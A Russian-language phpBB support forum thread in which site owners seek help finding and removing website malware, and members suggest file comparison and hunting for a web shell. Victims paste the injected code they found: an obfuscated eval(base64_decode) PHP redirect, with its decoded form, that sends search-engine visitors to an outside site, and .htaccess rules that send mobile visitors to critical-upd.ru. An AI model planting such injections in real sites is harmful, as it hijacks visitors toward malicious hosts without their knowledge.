Как убить Трояна?
					Правила форума
Местная Конституция | Шаблон запроса | Документация (phpBB3) | Переход на 3.0.6 и выше | FAQ | Как задавать вопросы | Как устанавливать расширения
Ваш вопрос может быть удален без объяснения причин, если на него есть ответы по приведённым ссылкам (а вы рискуете получить предупреждение
 ).
		
		
	Местная Конституция | Шаблон запроса | Документация (phpBB3) | Переход на 3.0.6 и выше | FAQ | Как задавать вопросы | Как устанавливать расширения
Ваш вопрос может быть удален без объяснения причин, если на него есть ответы по приведённым ссылкам (а вы рискуете получить предупреждение
- 
				AdmninsCluba
 - phpBB 1.2.1
 - Сообщения: 22
 - Стаж: 19 лет 2 месяца
 - Благодарил (а): 1 раз
 
Как убить Трояна?
обнаружено: троянская программа Trojan-Downloader.VBS.Small.dh
Почистил файл - index.php. Не помогло. Что надо сделать чтобы найти и убить скрипт?
Спасибо.
ОТВЕТ:
- проверяемся на вирусы
- меняем ВСЕ пароли и не храним их в FTP-клиенте.
- чистим файлы Index.* или заливаем из бэкапа.
http://virusinfo.info/pravila.html
			
			
									
						Почистил файл - index.php. Не помогло. Что надо сделать чтобы найти и убить скрипт?
Спасибо.
ОТВЕТ:
- проверяемся на вирусы
- меняем ВСЕ пароли и не храним их в FTP-клиенте.
- чистим файлы Index.* или заливаем из бэкапа.
http://virusinfo.info/pravila.html
- 
				Sheer
														 - Former team member
 - Сообщения: 12113
 - Стаж: 18 лет 8 месяцев
 - Откуда: Калининград не Кенигсберг
 - Благодарил (а): 36 раз
 - Поблагодарили: 1526 раз
 
Re: Как убить Трояна?
Татьяна5
Много ли у вас там модов стоит?
			
			
									
						Много ли у вас там модов стоит?
Скачайте все на локальный компьютер и сравнивайте файлы с дистрибутивом. WinMerge вам в помощь.Татьяна5 писал(а):как хоть выловить код вируса (без перезаливки всех файлов)?
Общие ошибки новичков (07.11.2005) & Как задавать вопросы
Мини FAQ
Если ничто другое не помогает, прочтите, наконец, инструкцию!
"Никакая инструкция не может перечислить всех обязанностей должностного лица, предусмотреть все отдельные случаи и дать вперёд соответствующие указания, а поэтому господа инженеры должны проявить инициативу и, руководствуясь знаниями своей специальности и пользой дела, принять все усилия для оправдания своего назначения".
Циркуляр Морского технического комитета №15 от 29.11.1910 г.
- 
				MIT
														 - Former team member
 - Сообщения: 2500
 - Стаж: 16 лет 7 месяцев
 - Откуда: 56°20′02″ с. ш. 36°42′45″ в. д.
 - Поблагодарили: 26 раз
 
Re: Как убить Трояна?
Татьяна5, проверил в двух браузерах — редиректа нет.
В файлах ничего подозрительного не заметил.
			
			
									
						В файлах ничего подозрительного не заметил.
- 
				МайскийЖук
														 - phpBB 3.0.7-PL1
 - Сообщения: 2535
 - Стаж: 16 лет 1 месяц
 - Поблагодарили: 71 раз
 
Как убить Трояна?
Подтверждаю. На данный момент редиректа нет. Проверено в четырех браузерах.
			
			
									
						Любовь и боль, покой и бой я как любой несу с собой…
			
						- 
				Татьяна5
														 - Поддержка

 - Сообщения: 12855
 - Стаж: 14 лет 2 месяца
 - Благодарил (а): 160 раз
 - Поблагодарили: 2328 раз
 
- 
				Pazh
														 - Former team member
 - Сообщения: 2317
 - Стаж: 15 лет 11 месяцев
 - Благодарил (а): 20 раз
 - Поблагодарили: 221 раз
 
Re: Как убить Трояна?
Внимание! на radikal-е снова обнаружен троян, осторожней с этим сервисом
			
			
									
						Помощь в ЛС/email только за WM или ЮMoney
			
						- 
				Di_Mok
														 - Former team member
 - Сообщения: 814
 - Стаж: 15 лет 7 месяцев
 - Откуда: Родной Гондурас ;)
 - Благодарил (а): 28 раз
 - Поблагодарили: 13 раз
 
Re: Как убить Трояна?
Заимел в 
Если по русски, вот:
Компутер стерилен как нераспакованный презерватив. Хостер, штоли? Поменял пароль, будем посмотреть.
			
			
									
						*.php такую прелесть:
		Скрытый текст
	
Код: Выделить всё
<?php	                                       			eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokbmNjdj1oZWFkZXJzX3NlbnQoKTsNCmlmICghJG5jY3Ypew0KJHJlZmVyZXI9JF9TRVJWRVJbJ0hUVFBfUkVGRVJFUiddOw0KJHVhPSRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXTsNCmlmIChzdHJpc3RyKCRyZWZlcmVyLCJ5YWhvbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJpbmciKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJyYW1ibGVyIikgb3Igc3RyaXN0cigkcmVmZXJlciwiZ29nbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImxpdmUuY29tIilvciBzdHJpc3RyKCRyZWZlcmVyLCJhcG9ydCIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIm5pZ21hIikgb3Igc3RyaXN0cigkcmVmZXJlciwid2ViYWx0YSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJlZ3VuLnJ1Iikgb3Igc3RyaXN0cigkcmVmZXJlciwic3R1bWJsZXVwb24uY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYml0Lmx5Iikgb3Igc3RyaXN0cigkcmVmZXJlciwidGlueXVybC5jb20iKSBvciBwcmVnX21hdGNoKCIveWFuZGV4XC5ydVwveWFuZHNlYXJjaFw/KC4qPylcJmxyXD0vIiwkcmVmZXJlcikgb3IgcHJlZ19tYXRjaCAoIi9nb29nbGVcLiguKj8pXC91cmxcP3NhLyIsJHJlZmVyZXIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIm15c3BhY2UuY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiZmFjZWJvb2suY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYW9sLmNvbSIpKSB7DQppZiAoIXN0cmlzdHIoJHJlZmVyZXIsImNhY2hlIikgb3IgIXN0cmlzdHIoJHJlZmVyZXIsImludXJsIikpewkJDQoJCWhlYWRlcigiTG9jYXRpb246IGh0dHA6Ly9zaXRlLnBvcnRyZWxheS5jb20vIik7DQoJCWV4aXQoKTsNCgl9DQp9DQp9"));
		Скрытый текст
	
Код: Выделить всё
error_reporting(0);
$nccv=headers_sent();
if (!$nccv){
$referer=$_SERVER['HTTP_REFERER'];
$ua=$_SERVER['HTTP_USER_AGENT'];
if (stristr($referer,"yahoo") or stristr($referer,"bing") or stristr($referer,"rambler") or stristr($referer,"gogo") or stristr($referer,"live.com")or stristr($referer,"aport") or stristr($referer,"nigma") or stristr($referer,"webalta") or stristr($referer,"begun.ru") or stristr($referer,"stumbleupon.com") or stristr($referer,"bit.ly") or stristr($referer,"tinyurl.com") or preg_match("/yandex\.ru\/yandsearch\?(.*?)\&lr\=/",$referer) or preg_match ("/google\.(.*?)\/url\?sa/",$referer) or stristr($referer,"myspace.com") or stristr($referer,"facebook.com") or stristr($referer,"aol.com")) {
if (!stristr($referer,"cache") or !stristr($referer,"inurl")){		
		header("Location: http://site.portrelay.com/");
		exit();
	}
}
}
- 
				MIT
														 - Former team member
 - Сообщения: 2500
 - Стаж: 16 лет 7 месяцев
 - Откуда: 56°20′02″ с. ш. 36°42′45″ в. д.
 - Поблагодарили: 26 раз
 
Re: Как убить Трояна?
Хостеру незачем заниматься такими глупостями. Ищи дырявые скрипты у себя. И ищи подозрительные и новые файлы — ты привёл только код полезной нагрузки, но не бекдор, который наверняка должен быть.
Ну и да, с чего ты взял, что компутер стерилен?
			
			
									
						Ну и да, с чего ты взял, что компутер стерилен?
- 
				Di_Mok
														 - Former team member
 - Сообщения: 814
 - Стаж: 15 лет 7 месяцев
 - Откуда: Родной Гондурас ;)
 - Благодарил (а): 28 раз
 - Поблагодарили: 13 раз
 
Re: Как убить Трояна?
Я ж не гворю, что намеренно.MIT писал(а):Хостеру незачем заниматься такими глупостями
Это понятно, но пока не реально - праздники, блин.MIT писал(а):Ищи дырявые скрипты у себя. И ищи подозрительные и новые файлы
Конечно, со 100% уверенностью сказать ничего нельзя. Но не давно перестановленная винда сминимальным набором софта аля: офис, ноутпад++, тотал, гимп... , и отсутствие привычки серфить где непопадя, придают некоторую уверенностьMIT писал(а):Ну и да, с чего ты взял, что компутер стерилен?
- 
				MAzZY
 - Бывший член :)
 - Сообщения: 2925
 - Стаж: 20 лет 5 месяцев
 - Благодарил (а): 19 раз
 - Поблагодарили: 30 раз
 - Забанен: Бессрочно
 
Re: Как убить Трояна?
Тогда нет. Тогда искать шелл. Влезть могли разными способами, сейчас уже не сказать как. Если не получается самостоятельно решить - пиши в личку, помогу. Опыт имеется.
			
			
									
						Изменены все файлы .htaccess - уязвимость скриптов?
Сегодня были дополнены все файлы .htaccess на сайте, несмотря на запрет записи (444), следующими строчками:
Примерно такие же записи были дополнены в .htaccess - 18 декабря 2012г.
Хостер говорит, что это уязвимость ваших скриптов. Что атрибут 444 на 644 могут поменять скрипты.
Что интересно - у измененных файлов не поменялась дата изменения, она осталась 19.12.12 - эта та дата, когда я восстановил все файлы .htaccess после случая 18.12.12. Скрипты тоже могут такое вытворять?
Также заметил, что в файлах .htaccess изменен формат переноса строк с UNIX на WINDOWS.
Сам я создал и захожу на хостинг через виртуальную машину, где установлен Windows 7, антивирус Касперского и ftp-клиент FileZilla Client. Пароли хранятся только в зашифрованном архиве, который после его закрытия затирает временную папку. В браузере и ftp-клиенте пароли (для захода на хостинг) не сохраняю.
Есть подозрения на ftp-клиент FileZilla Client, который утащил мои пароли. Хотя хостер настаивает, что это уязвимость ваших скриптов. А на самом деле как узнать кто, откуда, каким способом меняет файлы .htaccess?
			
			
									
						Код: Выделить всё
RewriteEngine on
RewriteCond %{HTTP_USER_AGENT} (android|midp|j2me|symbian|series\ 60|symbos|windows\ mobile|windows\ ce|ppc|smartphone|blackberry|mtk) [NC]
RewriteCond %{HTTP_USER_AGENT} !(accoona|ia_archiver|antabot|ask\ jeeves|baidu|eltaindexer|feedfetcher|gamespy|gigabot|googlebot|gsa-crawler|grub-client|gulper|slurp|mihalism|msnbot|worldindexer|ooyyo|pagebull|scooter|w3c_validator|jigsaw|webalta|yahoofeedseeker|mmcrawler|yandexbot|yandeximages|yandexvideo|yandexmedia|yandexblogs|yandexaddurl|yandexfavicons|yandexdirect|yandexmetrika|yandexcatalog|yandexnews|yandeximageresizer) [NC]
RewriteRule (.*) http://critical-upd.ru/?upd&source=.htaccess [L,R=302] #Хостер говорит, что это уязвимость ваших скриптов. Что атрибут 444 на 644 могут поменять скрипты.
Что интересно - у измененных файлов не поменялась дата изменения, она осталась 19.12.12 - эта та дата, когда я восстановил все файлы .htaccess после случая 18.12.12. Скрипты тоже могут такое вытворять?
Также заметил, что в файлах .htaccess изменен формат переноса строк с UNIX на WINDOWS.
Сам я создал и захожу на хостинг через виртуальную машину, где установлен Windows 7, антивирус Касперского и ftp-клиент FileZilla Client. Пароли хранятся только в зашифрованном архиве, который после его закрытия затирает временную папку. В браузере и ftp-клиенте пароли (для захода на хостинг) не сохраняю.
Есть подозрения на ftp-клиент FileZilla Client, который утащил мои пароли. Хотя хостер настаивает, что это уязвимость ваших скриптов. А на самом деле как узнать кто, откуда, каким способом меняет файлы .htaccess?
- 
				МайскийЖук
														 - phpBB 3.0.7-PL1
 - Сообщения: 2535
 - Стаж: 16 лет 1 месяц
 - Поблагодарили: 71 раз
 
Изменены все файлы .htaccess - уязвимость скриптов?
Только на астральном уровне.
На какие конкретно скрипты грешит хостер? Так можно от любой проблемы отмазаться: «это ваши скрипты». А какие скрипты-то?
			
			
									
						На какие конкретно скрипты грешит хостер? Так можно от любой проблемы отмазаться: «это ваши скрипты». А какие скрипты-то?
Любовь и боль, покой и бой я как любой несу с собой…
			
						Re: Изменены все файлы .htaccess - уязвимость скриптов?
Я тоже задавал такой вопрос, ответ был:
Это уязвимость скриптов. Сайт сломан через дыры в скриптах а не через пароли.
У нас возможности отслеживать ваши скрипты нет.
А как еще можно изменить файлы .htaccess не затронув дату изменения?
			
			
									
						Это уязвимость скриптов. Сайт сломан через дыры в скриптах а не через пароли.
У нас возможности отслеживать ваши скрипты нет.
А как еще можно изменить файлы .htaccess не затронув дату изменения?
- 
				МайскийЖук
														 - phpBB 3.0.7-PL1
 - Сообщения: 2535
 - Стаж: 16 лет 1 месяц
 - Поблагодарили: 71 раз
 
Изменены все файлы .htaccess - уязвимость скриптов?
Скрипты форумного движка phpBB3 не позволяют просто так изменять какие-либо файлы. Тем более, 
Что еще есть на сайте/форуме?
			
			
									
						.htaccess. Это все, что я знаю.Что еще есть на сайте/форуме?
Любовь и боль, покой и бой я как любой несу с собой…
			
						
